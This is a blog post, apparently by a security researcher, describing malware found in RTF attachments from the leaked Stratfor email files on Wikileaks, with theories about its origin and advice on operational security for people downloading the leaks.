I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found apart from what is already well-documented about this exploit was recovered by scraping a bit of the shell code using this Python script (Javascript needs to be enabled to see the github embed, or you can view it here instead - the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):
This is what was recovered (another github embed that can be viewed here for those who don't trust someone else's javascript):
I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:
"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."
At this point very little conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified as infected with malware here as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expect this content to be sanitized before it is provided to them by a media organization.
When downloading and viewing these files, most are attempting to protect themselves from surveillance; things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and infected files, there are significant differences. For example, if air gapping can be an effective deterrent against surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their airgap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity are easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.
This is why notification of malicious software in these files is important: so users can adjust their operational security plans to adjust for it.
There are a number of theories that could account for the presence of this malicious software. Perhaps the least-wildeyed of those theories is that Statfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).
That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.
This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" are of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.
The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.
One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.
NOTE: my second post on this on this topic is online, and contains further malware analysis.
Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.